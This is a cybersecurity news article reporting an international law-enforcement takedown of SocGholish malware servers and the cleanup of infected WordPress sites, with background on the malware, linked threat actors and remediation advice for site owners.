Operation Endgame Disrupts SocGholish: 106 Servers Down, 15K WordPress Sites Cleaned

In a significant blow against one of the web's most persistent malware distribution networks, Dutch law enforcement, working alongside the FBI, the Royal Canadian Mounted Police, and Germany's Bundeskriminalamt, has dismantled 106 servers tied to the SocGholish (FakeUpdates) JavaScript downloader and cleaned 14,971 infected WordPress websites as part of Operation Endgame. The coordinated takedown, announced in 2026, also led to notifications being sent to affected site owners, instructing them to update their content management systems, rotate compromised credentials, and remove any unauthorized administrator accounts. "With these actions we deprive cybercriminals of access to infected computer systems," said Maikel Rollman of the Netherlands National High Tech Crime Unit, adding that the disruption limits the malware's use in attacks on critical infrastructure worldwide. The effort builds on the same international framework that, in 2024, took down dozens of loader and dropper families used by ransomware affiliates across Europe and North America.

Active since 2017, SocGholish operates as a JavaScript-based downloader delivered through compromised websites that masquerade as legitimate update prompts for Google Chrome, Mozilla Firefox, and other widely used software. Once executed, it establishes a foothold in victim systems, effectively enrolling them in a botnet that is then rented out to threat actors tracked under aliases such as Gold Prelude, Mustard Tempest, Purple Vallhund, TA569, and UNC1543. According to the FBI's Cyber Division, secondary payloads distributed through SocGholish have included the Dridex banking trojan, Raspberry Robin (Roshtyak), the Gholoader loader, and ransomware families operated by Evil Corp (DEV-0243 / Indrik Spider / UNC2165), LockBit, and RansomHub. In November 2025, Arctic Wolf observed the RomCom cluster leveraging SocGholish access to deploy the Mythic Agent, underscoring the malware's role as a commodity initial-access service for both financially motivated and espionage-oriented operators.

Technically, SocGholish infections on WordPress sites occur through direct JavaScript injections, intermediate loader files, and tampered update scripts, often placed in header or footer templates after a successful admin credential compromise. Orange Cyberdefense has tracked IP-geolocated compromises spanning dozens of countries, with the bulk concentrated in North America and Western Europe. Website owners are urged to audit their CMS integrity, validate their SSL/TLS configurations using a tool like the SSL/TLS checker, inspect any newly registered or suspicious domains referenced in their page source via WHOIS lookup, and rotate all administrator and database credentials, which can be tested against known leaks through a password checker. Operation Endgame officials cautioned that the SocGholish takedown marks only the first phase of a broader campaign, and that more infrastructure is expected to be seized in the coming months.